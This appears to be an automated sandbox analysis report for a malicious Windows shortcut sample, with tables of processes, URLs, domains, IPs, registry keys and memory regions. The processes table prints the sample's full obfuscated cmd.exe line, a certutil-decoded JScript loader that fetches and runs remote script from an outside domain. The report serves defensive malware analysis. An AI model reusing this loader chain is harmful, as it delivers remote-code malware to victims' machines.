Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Pyo37mDzQ2.lnk
|
MS Windows shortcut, Item id list present, Has Working directory, Has command line arguments, Archive, ctime=Sun Dec 31 23:06:32
1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\9cEA9JA\9cEA9JA.jS
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /V/D/c md C:\9cEA9JA\>nul 2>&1 &&s^eT SEEH=C:\9cEA9JA\^9cEA9JA.^jS&&echo dmFyIENmS3I9InNjIisiciI7RGZLcj0iaXAiKyJ0OmgiO0VmS3I9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDZktyK0RmS3IrRWZLcisiLy9uaXVhOWYudGFiY29wZXJvby5zYnMvPzEvIik7>!SEEH!&&cErtUtil
-f -dEco^de !SEEH! !SEEH!&&ca^ll !SEEH!
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\9cEA9JA\9cEA9JA.jS"
|
|
|
|
C:\Windows\System32\certutil.exe
|
cErtUtil -f -dEcode C:\9cEA9JA\9cEA9JA.jS C:\9cEA9JA\9cEA9JA.jS
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://niua9f.tabcoperoo.sbs/?1/
|
104.21.40.83
|
|
|
|
hTtP://niua9f.tabcoperoo.sbs/?1/
|
unknown
|
||
|
http://niua9f.tabcoperoo.sbs/
|
unknown
|
||
|
https://www.cloudflare.com/cdn-cgi/errorP%
|
unknown
|
||
|
https://www.cloudflare.com/
|
unknown
|
||
|
https://www.cloudflare.com/cdn-cgi/error
|
104.16.123.96
|
||
|
https://www.cloudflare.com/cdn-cgi/errore.com/U
|
unknown
|
||
|
https://www.cloudflare.com/M
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
niua9f.tabcoperoo.sbs
|
104.21.40.83
|
|
|
|
www.cloudflare.com
|
104.16.123.96
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.21.40.83
|
niua9f.tabcoperoo.sbs
|
United States
|
|
|
|
104.16.123.96
|
www.cloudflare.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
LangID
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.FriendlyAppName
|
||
|
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
|
C:\Windows\System32\WScript.exe.ApplicationCompany
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7
|
Name
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7
|
Name
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7
|
Name
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
21062570000
|
remote allocation
|
page read and write
|
||
|
6B74BFC000
|
stack
|
page read and write
|
||
|
6B74AFF000
|
stack
|
page read and write
|
||
|
6B74CFA000
|
stack
|
page read and write
|
||
|
210640A0000
|
trusted library allocation
|
page read and write
|
||
|
21062084000
|
heap
|
page read and write
|
||
|
2106258C000
|
heap
|
page read and write
|
||
|
6B747FE000
|
stack
|
page read and write
|
||
|
210607A1000
|
heap
|
page read and write
|
||
|
21062410000
|
heap
|
page read and write
|
||
|
210606D0000
|
heap
|
page read and write
|
||
|
2106078D000
|
heap
|
page read and write
|
||
|
210609AE000
|
heap
|
page read and write
|
||
|
25675B00000
|
heap
|
page read and write
|
||
|
21060745000
|
heap
|
page read and write
|
||
|
21060530000
|
heap
|
page read and write
|
||
|
210607CC000
|
heap
|
page read and write
|
||
|
2106259B000
|
heap
|
page read and write
|
||
|
25675B20000
|
heap
|
page read and write
|
||
|
21062080000
|
heap
|
page read and write
|
||
|
21060745000
|
heap
|
page read and write
|
||
|
21062570000
|
heap
|
page read and write
|
||
|
2106078D000
|
heap
|
page read and write
|
||
|
210606F9000
|
heap
|
page read and write
|
||
|
2106073B000
|
heap
|
page read and write
|
||
|
21060799000
|
heap
|
page read and write
|
||
|
2106078D000
|
heap
|
page read and write
|
||
|
21063F30000
|
heap
|
page read and write
|
||
|
210609A0000
|
heap
|
page read and write
|
||
|
DD2157C000
|
stack
|
page read and write
|
||
|
21060783000
|
heap
|
page read and write
|
||
|
21060670000
|
heap
|
page read and write
|
||
|
21060783000
|
heap
|
page read and write
|
||
|
6B74DFE000
|
stack
|
page read and write
|
||
|
2106259D000
|
heap
|
page read and write
|
||
|
2106073E000
|
heap
|
page read and write
|
||
|
210607CC000
|
heap
|
page read and write
|
||
|
2106078D000
|
heap
|
page read and write
|
||
|
21062570000
|
remote allocation
|
page read and write
|
||
|
25675F00000
|
heap
|
page read and write
|
||
|
21060705000
|
heap
|
page read and write
|
||
|
210606F9000
|
heap
|
page read and write
|
||
|
DD218FE000
|
stack
|
page read and write
|
||
|
2106077E000
|
heap
|
page read and write
|
||
|
21062415000
|
heap
|
page read and write
|
||
|
2106070C000
|
heap
|
page read and write
|
||
|
21060799000
|
heap
|
page read and write
|
||
|
21060799000
|
heap
|
page read and write
|
||
|
2106079C000
|
heap
|
page read and write
|
||
|
25675B68000
|
heap
|
page read and write
|
||
|
2106073E000
|
heap
|
page read and write
|
||
|
2106073B000
|
heap
|
page read and write
|
||
|
210607A1000
|
heap
|
page read and write
|
||
|
2106073B000
|
heap
|
page read and write
|
||
|
21060783000
|
heap
|
page read and write
|
||
|
DD215FD000
|
stack
|
page read and write
|
||
|
25675B60000
|
heap
|
page read and write
|
||
|
6B74EFE000
|
stack
|
page read and write
|
||
|
25675A90000
|
heap
|
page read and write
|
||
|
21060705000
|
heap
|
page read and write
|
||
|
21060728000
|
heap
|
page read and write
|
||
|
210607CE000
|
heap
|
page read and write
|
||
|
25677910000
|
heap
|
page read and write
|
||
|
210607A1000
|
heap
|
page read and write
|
||
|
6B74FFF000
|
stack
|
page read and write
|
||
|
DD2187E000
|
stack
|
page read and write
|
||
|
6B743F8000
|
stack
|
page read and write
|
||
|
210606D8000
|
heap
|
page read and write
|
||
|
6B749FF000
|
stack
|
page read and write
|
||
|
2106070A000
|
heap
|
page read and write
|
||
|
6B743F6000
|
stack
|
page read and write
|
||
|
21060745000
|
heap
|
page read and write
|
||
|
210609A5000
|
heap
|
page read and write
|
||
|
21062594000
|
heap
|
page read and write
|
||
|
2106258C000
|
heap
|
page read and write
|
||
|
2106259D000
|
heap
|
page read and write
|
||
|
21060761000
|
heap
|
page read and write
|
||
|
21062594000
|
heap
|
page read and write
|
||
|
2106077E000
|
heap
|
page read and write
|
||
|
21060783000
|
heap
|
page read and write
|
||
|
21060728000
|
heap
|
page read and write
|
||
|
2106073E000
|
heap
|
page read and write
|
||
|
2106077E000
|
heap
|
page read and write
|
||
|
256778D0000
|
heap
|
page read and write
|
||
|
210606F5000
|
heap
|
page read and write
|
||
|
210607CE000
|
heap
|
page read and write
|
||
|
2106259C000
|
heap
|
page read and write
|
||
|
21060728000
|
heap
|
page read and write
|
||
|
21060705000
|
heap
|
page read and write
|
||
|
210607CE000
|
heap
|
page read and write
|
||
|
210607CC000
|
heap
|
page read and write
|
||
|
21060690000
|
heap
|
page read and write
|
||
|
25675F05000
|
heap
|
page read and write
|
||
|
6B746FE000
|
stack
|
page read and write
|
||
|
2106077E000
|
heap
|
page read and write
|
||
|
2106079E000
|
heap
|
page read and write
|
||
|
21062570000
|
remote allocation
|
page read and write
|
||
|
210606F7000
|
heap
|
page read and write
|
There are 88 hidden memdumps, click here to show them.